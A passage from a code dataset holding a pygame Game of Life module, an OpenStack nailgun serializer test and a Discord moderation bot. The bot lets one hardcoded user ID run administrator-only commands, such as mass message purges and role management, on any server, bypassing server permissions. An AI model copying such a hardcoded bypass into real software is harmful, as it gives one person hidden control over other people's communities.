grid.copy()\n for i in range(N):\n for j in range(N):\n # calculating the activation of a cell's 8 neighbors\n total_activation = int(\n (X[i, (j - 1) % N] + \n X[i, (j + 1) % N] + \n X[(i - 1) % N, j] + \n X[(i + 1) % N, j] +\n X[(i - 1) % N, (j - 1) % N] + \n X[(i - 1) % N, (j + 1) % N] + \n X[(i + 1) % N, (j - 1) % N] + \n X[(i + 1) % N, (j + 1) % N])\n )\n # implementing Conway's 4 rules\n if X[i, j] == 0:\n if total_activation == 3: # birth \n grid[i, j] = 1\n else: \n grid[i, j] = 0 # loneliness \n elif X[i, j] == 1:\n if (total_activation < 2) or (total_activation > 3): # loneliness & overcrowding \n grid[i, j] = 0\n else:\n grid[i, j] = 1 # survival\n return grid\n \n def initial(self, pattern): \n \"\"\" \n Turns cells alive according to the pattern argument.\n Returns the grid with the chosen initial pattern. The \n location of the pattern is chosen randomly by sampling \n from grid coordinates. The coordinates of the edges are \n excluded to make sure the pattern is fully visible. \n \n 1 = glider \n 2 = R-pentomino \n 3 = light-weighted space ship \n 4 = pentadecathlon\n \n Parameters \n \n pattern \n Specified in the main function play(). \n The default is a random draw between 1 and 4. \n \"\"\"\n index = r.randrange(10, 50, 1) # randomly pick a location \n if pattern == 1: # glider \n grid[index, index] = 1\n grid[index, index + 1] = 1\n grid[index, index + 2] = 1\n grid[index - 1, index + 2] = 1\n grid[index - 2, index + 1] = 1\n elif pattern == 2: # R-pentomino \n grid[index, index] = 1\n grid[index + 1, index] = 1\n grid[index + 2, index] = 1\n grid[index + 1, index - 1] = 1\n grid[index, index + 1] = 1\n elif pattern == 3: # light-weight space ship\n grid[index, index] = 1\n grid[index, index + 1] = 1\n grid[index, index + 2] = 1\n grid[index, index + 3] = 1\n grid[index - 1, index] = 1\n grid[index - 2, index] = 1\n grid[index - 3, index + 1] = 1\n grid[index - 3, index + 4] = 1\n grid[index - 1, index + 4] = 1\n elif pattern == 4: # pentadecathlon\n l = list(range(index, index + 10))\n grid[index, [x for i, x in enumerate(l) if (i != 2 and i != 7)]] = 1\n grid[index + 1, [index + 2, index + 7]] = 1\n grid[index - 1, [index + 2, index + 7]] = 1\n return grid\n \n def update(self):\n \"\"\" \n This function applies Conway's rules to the current pattern if\n the logical attribute iterate is True. iterate is True if the user \n has pressed the start button. \n \"\"\"\n if self.iterate:\n self.rules()\n \n def draw(self, screen):\n \"\"\" \n Draws the grid based on the matrix values. \n If the matrix value is 1, the cell is drawn black. \n If the matrix value is 0, the cell is drawn white. \n \"\"\"\n screen.fill(grey)\n for i in range(N):\n for j in range(N):\n if grid[i, j] == 0:\n color = white\n elif grid[i][j] == 1:\n color = black\n rect = pygame.draw.rect(screen, color, ((cell_width + margin) * j + margin, # x-coordinates of top-left corner \n (cell_height + margin) * i + margin, # y-coordinates of top-left corner\n cell_width, cell_height)) \n return rect \n \n def state(self):\n \"\"\" \n Uses mouse clicks to turn dead \n cells live and kill live cells. \n \"\"\"\n if grid[i][j] == 0:\n grid[i][j] = 1\n elif grid[i][j] == 1:\n grid[i][j] = 0\n return grid \n \n def reset(self):\n \"\"\" \n Stops iterating the rules \n and kills all the cells. \n Returns an empty grid. \n \"\"\"\n for i in range(N):\n for j in range(N):\n grid[i, j] = 0\n return grid \n \n def text_objects(self, text, font):\n \"\"\" \n Creates a text surface which is later added \n to the START, PAUSE and RESET buttons. \n \"\"\"\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()", "sub_path": "conway/utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 10884, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 93, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 112, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 119, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 124, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 126, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 137, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 137, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 190, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 242, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 242, "usage_type": "attribute"}]} +{"seq_id": "52184116", "text": "# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom mock import patch\n\nfrom nailgun.test import base\n\nfrom nailgun.orchestrator import deployment_serializers\n\n\nCREDS = {'tenant': {'value': 'NONDEFAULT'}}\n\n\nclass TestNeutronDeploymentSerializer(base.BaseTestCase):\n\n def setUp(self):\n super(TestNeutronDeploymentSerializer, self).setUp()\n self.env.create(cluster_kwargs={'net_provider': 'neutron'})\n self.cluster = self.env.clusters[0]\n self.serializer = (deployment_serializers.\n NeutronNetworkDeploymentSerializer)\n\n def verify_network_tenant(self, network):\n self.assertEqual(network['tenant'], CREDS['tenant']['value'])\n\n @patch(('nailgun.orchestrator.deployment_serializers.objects.'\n 'Cluster.get_creds'), return_value=CREDS)\n def test_internal_network_changes_tenant_name(self, creds):\n int_network = self.serializer._generate_internal_network(self.cluster)\n self.verify_network_tenant(int_network)\n\n @patch(('nailgun.orchestrator.deployment_serializers.objects.'\n 'Cluster.get_creds'), return_value=CREDS)\n def test_external_network_changes_tenant_name(self, creds):\n ext_network = self.serializer._generate_external_network(self.cluster)\n self.verify_network_tenant(ext_network)\n\n @patch(('nailgun.orchestrator.deployment_serializers.objects.'\n 'Cluster.get_creds'), return_value=CREDS)\n def test_predefined_networks_tenant_name(self, creds):\n predefined_network = self.serializer.generate_predefined_networks(\n self.cluster)\n self.verify_network_tenant(predefined_network['net04'])\n self.verify_network_tenant(predefined_network['net04_ext'])\n", "sub_path": "nailgun/nailgun/test/unit/test_deployment_network_serializer.py", "file_name": "test_deployment_network_serializer.py", "file_ext": "py", "file_size_in_byte": 2293, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nailgun.test.base.BaseTestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "nailgun.test.base", "line_number": 25, "usage_type": "name"}, {"api_name": "nailgun.orchestrator.deployment_serializers.NeutronNetworkDeploymentSerializer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "nailgun.orchestrator.deployment_serializers", "line_number": 31, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 37, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 43, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "398380040", "text": "import discord\nfrom discord.ext import commands\nimport random\nimport os.path\nimport socket\nimport sys\nfrom forex_python.bitcoin import BtcConverter\n\n\n\nTOKEN = 'BOT TOKEN HERE'\n\nbot = commands.Bot(command_prefix = '!')\n\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as\\n' + bot.user.name + '\\n' + bot.user.id + '\\n' + 'Python: {}'.format(sys.version) + '\\n------')\n\n with open('status.txt', 'r') as f_o:\n await bot.change_presence(game=discord.Game(name=f_o.readline()), status=None, afk=False)\n\n\n\n@bot.event\nasync def on_server_role_delete(role):\n if os.path.isfile('/home/pi/pi_bot/roles/' + role.server.id + '.txt'):\n with open('/home/pi/pi_bot/roles/' + role.server.id + '.txt', 'r') as f_o:\n rolefile = f_o.readline()\n if role.id in rolefile:\n rolefile = rolefile.replace(role.id + 'x', '', 1)\n if rolefile == '':\n os.remove('/home/pi/pi_bot/roles/' + role.server.id + '.txt')\n else:\n with open('/home/pi/pi_bot/roles/' + role.server.id + '.txt', 'w') as f_o:\n f_o.write(rolefile)\n\n\n\n@bot.event\nasync def on_member_join(member):\n if os.path.isfile('/home/pi/pi_bot/autoassign/' + member.server.id + '.txt'):\n for item in member.server.roles:\n with open('/home/pi/pi_bot/autoassign/' + member.server.id + '.txt', 'r') as f_o:\n if item.id in f_o.readline():\n await bot.add_roles(member, item)\n\n\n\n@bot.event\nasync def on_message(message):\n \n \n \n #Commands\n if not message.author.id == '375343366126436355' and message.content.startswith('!'):\n \n \n \n #Bool checks\n purgecheck = 'placeholder'\n \n \n \n #Help Commands\n if message.content.startswith ('!help'):\n embed = discord.Embed(title='Help', description='Subcommands for help on categories.')\n embed.add_field(name='!help', value='Shows this message.', inline=True)\n embed.add_field(name='!rolehelp', value='Role System Commands', inline=True)\n embed.add_field(name='!adminhelp', value='Admin-only commands.', inline=True)\n embed.add_field(name='!mischelp', value='Miscellaneous Commands.', inline=True)\n embed.add_field(name='Twitter Updates:', value='https://twitter.com/discord_pi_bot')\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!rolehelp'):\n embed = discord.Embed(title='!role Subcommands', description='A list of roles members can choose between.')\n embed.add_field(name='!role', value='Subcommands:\\nview - Sends the list\\nset - Gives you the role you specify in the list (NOT @mention).\\nAdmin-only Subcommands:\\nadd - Adds the @mentioned role to the list.\\nremove - Removes the @mentioned role from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!adminhelp'):\n embed = discord.Embed(title='Admin-Only Commands', description='Only members with the Administrator permission can use these commands.')\n embed.add_field(name='!purge', value='Mass deletes messages. Ex: !purge 20', inline=False)\n embed.add_field(name='!addroles', value='Adds roles you specify to a list of roles, members can assign themselves one of them with !setrole. Ex: !addroles @role1 @role2', inline=False)\n embed.add_field(name='!autoassign', value='Adds a role to be automatically assigned to a user when they join.\\nSubcommands:\\nview - Shows the autoassign list.\\nadd - adds the @mentioned roles to the list.\\nremove - removes the @mentioned roles from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!mischelp'):\n embed = discord.Embed(title='Miscellaneous Commands', description='Commands that don\\'t fall under any !help category')\n embed.add_field(name='!lfg', value='Adds or removes you from the \"Looking for game\" list in that channel.', inline=False)\n embed.add_field(name='!lfg list', value='Shows the \"Looking for game\" list in that channel.', inline=False)\n embed.add_field(name='!btc', value='Sends the Bitcoin Exchange rate.', inline=False)\n embed.add_field(name='!pfp', value='Gets the profile picture of the @mentioned user.', inline=False)\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n \n \n \n \n if not message.channel.is_private:\n \n \n \n #Dev Commands\n if message.author.id == 'YOUR ID HERE':\n if message.content.startswith('!setstatus'):\n status = message.content[11:len(message.content)]\n with open('status.txt', 'w') as f_o:\n f_o.write(status)\n await bot.change_presence(game=discord.Game(name=status), status=None, afk=False)\n await bot.send_message(message.channel, message.author.mention + ' changed status to ' + status)\n elif message.content.startswith('!say'):\n await bot.send_message(message.channel, message.content.replace('!say ', '', 1))\n elif message.content.startswith('!send'):\n channel = message.content[0:24].replace('!send ', '', 1)\n await bot.send_message(bot.get_channel(channel), message.content[25:len(message.content)])\n elif message.content.startswith('!servers'):\n msg = ''\n for item in bot.servers:\n msg = msg + item.name + ' ' + str(len(item.members)) + '\\n'\n await bot.send_message(message.channel, msg)\n elif message.content.startswith('!announcement'):\n for server in bot.servers:\n for channel in server.channels:\n if channel.type == discord.ChannelType.text:\n if channel.permissions_for(server.me).send_messages:\n if channel.name == 'general':\n embed=discord.Embed(title='Message From Developer ' + message.author.name, description=message.content.replace('!announcement ', '', 1))\n await bot.send_message(channel, embed=embed)\n break\n \n \n \n #Administrator-Only Commands\n if message.author.server_permissions.administrator or message.author.id == '268138118270418954':\n if message.content.startswith('!purge'):\n if int(message.content[7:10]) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Cannot delete 0 messages.')\n else:\n purgecheck = 'a'\n await bot.delete_message(message)\n deleted = await bot.purge_from(message.channel, limit=int(message.content[7:10]), check=None)\n await bot.send_message(message.channel, message.author.mention + ' Successfully deleted {} message(s).'.format(len(deleted)))\n elif message.content.startswith('!autoassign'):\n if message.content[12:16] == 'view':\n if not os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The autoassign list is empty.')\n else:\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Autoassign List:', description=rolelist)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[12:17] == 'clear':\n if os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n os.remove('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared autoassign list.')\n else:\n await bot.send_message(message.channel, message.author.mention + ' The autoassign list is already empty.')\n elif message.content[12:15] == 'add':\n if len(message.role_mentions) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Make sure to mention the role(s) to add.')\n else:\n if not os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write('')\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'w') as f_o:\n for item in message.role_mentions:\n fileline = fileline + item.id + 'x'\n f_o.write(fileline)\n addedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n addedroles = addedroles + item.name + ' '\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Autoassign List:', description=rolelist)\n embed.add_field(name='Added Roles:', value=addedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[12:18] == 'remove':\n if not os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The autoassign list is empty.')\n else:\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n removedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n fileline = fileline.replace(item.id + 'x', '', 1)\n removedroles = removedroles + item.name + ' '\n if fileline == '':\n os.remove('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared autoassign list.')\n else:\n if removedroles == '':\n await bot.send_message(message.channel, message.author.mention + ' Mentioned roles aren\\'t in the list.')\n else:\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write(fileline)\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Autoassign List:', description=rolelist)\n embed.add_field(name='Removed Roles:', value=removedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n else:\n embed = discord.Embed(title='Not a valid subcommand')\n embed.add_field(name='!autoassign (Subcommand)', value='view - Shows the autoassign list.\\nadd - adds the @mentioned roles to the list.\\nremove - removes the @mentioned roles from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n \n \n \n \n #Role Commands\n if message.content.startswith('!role') and not message.content.startswith('!rolehelp'):\n if message.content[6:10] == 'view':\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The role list is empty.')\n else:\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Role List:', description=rolelist)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[6:9] == 'set':\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The role list is empty.')\n else:\n rolelist = await bot.get_server_roles(message.server)\n removerole = ''\n real = False\n for role in rolelist:\n if role in message.author.roles:\n removerole = role\n if role.name == message.content.replace('!role set ', '', 1):\n setrole = role\n real = True\n if real == False:\n await bot.send_message(message.channel, message.author.mention + ' That role doesn\\'t exist, use !rolehelp for help.')\n else:\n embed = discord.Embed(title='Set role to:', description=setrole.name)\n if not removerole == '':\n await bot.remove_roles(message.author, removerole)\n embed.add_field(name='Removed role:', value=removerole.name, inline=True)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.add_roles(message.author, setrole)\n await bot.send_message(message.channel, embed=embed)\n elif message.author.server_permissions.administrator or message.author.id == '268138118270418954':\n if message.content[6:11] == 'clear':\n if os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n os.remove('/home/pi/pi_bot/roles/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared role list.')\n else:\n await bot.send_message(message.channel, message.author.mention + ' The role list is already empty.')\n elif message.content[6:9] == 'add':\n if len(message.role_mentions) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Make sure to mention the role(s) to add.')\n else:\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write('')\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'w') as f_o:\n for item in message.role_mentions:\n fileline = fileline + item.id + 'x'\n f_o.write(fileline)\n addedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n addedroles = addedroles + item.name + ' '\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Role List:', description=rolelist)\n embed.add_field(name='Added Roles:', value=addedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[6:12] == 'remove':\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The role list is empty.')\n else:\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n removedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n fileline = fileline.replace(item.id + 'x', '', 1)\n removedroles = removedroles + item.name + ' '\n if fileline == '':\n os.remove('/home/pi/pi_bot/roles/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared role list.')\n else:\n if removedroles == '':\n await bot.send_message(message.channel, message.author.mention + ' Mentioned roles aren\\'t in the list.')\n else:\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write(fileline)\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Role List:', description=rolelist)\n embed.add_field(name='Removed Roles:', value=removedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n else:\n embed = discord.Embed(title='Not a valid subcommand')\n embed.add_field(name='!role (Subcommand)', value='view - Shows the role list.\\nadd - adds the @mentioned roles to the list.\\nremove - removes the @mentioned roles from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n \n \n \n #Misc. Commands\n if message.content.startswith('!lfg'):\n if message.content[5:9] == 'list':\n if not os.path.isfile('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt'):\n embed=discord.Embed(title='There is currently no one looking for a game')\n else:\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'r') as f_o:\n file = f_o.readline()\n msg = ''\n for member in message.server.members:\n if member.id in file:\n msg = msg + member.name + '\\n'\n embed=discord.Embed(title='User(s) looking for a game:', description=msg)\n else:\n if not os.path.isfile('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt'):\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'w') as f_o:\n f_o.write(message.author.id + 'x')\n embed=discord.Embed(title='You are now looking for game')\n else:\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'r') as f_o:\n file = f_o.readline()\n if message.author.id in file:\n file = file.replace(message.author.id + 'x', '', 1)\n if file == '':\n await bot.send_message(message.channel, 'here')\n os.remove('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt')\n else:\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'w') as f_o:\n f_o.write(file)\n embed=discord.Embed(title='You are no longer looking for a game')\n else:\n file = file + message.author.id + 'x'\n embed=discord.Embed(title='You are now looking for a game')\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'w') as f_o:\n f_o.write(file)\n embed.set_footer(text='Requested By: ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!pfp'):\n if len(message.mentions) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Make sure to mention the user.')\n else:\n await bot.send_message(message.channel, message.mentions[0].avatar_url)\n elif message.content.startswith('!btc'):\n await bot.delete_message(message)\n loadingmsg = await bot.send_message(message.channel, 'Getting bitcoin rates...')\n btc = BtcConverter(force_decimal=True)\n embed = discord.Embed(title='Bitcoin -> Currency:', description='USD: $' + str(btc.get_latest_price('USD'))[0:8] + '\\nCAD: $' + str(btc.get_latest_price('CAD'))[0:8] + '\\nEUR: €' + str(btc.get_latest_price('EUR'))[0:8] + '\\nAUD: $' + str(btc.get_latest_price('AUD'))[0:8])\n embed.add_field(name='Currency -> Bitcoin:', value='USD: ฿' + str(btc.convert_to_btc(1, 'USD'))[0:10] + '\\nCAD: ฿' + str(btc.convert_to_btc(1, 'CAD'))[0:10] + '\\nEUR: ฿' + str(btc.convert_to_btc(1, 'EUR'))[0:10] + '\\nAUD: ฿' + str(btc.convert_to_btc(1, 'AUD'))[0:10], inline=False)\n embed.set_thumbnail(url=\"https://bitcoin.org/img/icons/opengraph.png\")\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n await bot.delete_message(loadingmsg)\n return\n\t \n\t \n\t \n\t #End Of Command Constants\n if purgecheck == 'placeholder':\n await bot.delete_message(message)\n\n\n\n#Misc Fuctions\n@bot.event\nasync def get_server_roles(server):\n serverrolesfunc = []\n with open('/home/pi/pi_bot/roles/' + server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n for role in server.roles:\n if role.id in fileline:\n serverrolesfunc.append(role)\n return serverrolesfunc\n\nbot.run(TOKEN)", "sub_path": "pi_bot/pibot.py", "file_name": "pibot.py", "file_ext": "py", "file_size_in_byte": 26471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.version", "line_number": 19, "usage_type": "attribute"}, {"api_name": "discord.Game", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 43, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 68, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 77, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 82, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 89, "usage_type": "call"}, {"api_name": "discord.Game", "line_number": 110, "usage_type": "call"}, {"api_name": "discord.ChannelType", "line_number": 125, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 146, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 159, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 168, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 213, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 218, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 229, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 242, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 266, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 275, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 275, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 275, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 297, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 320, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 335, 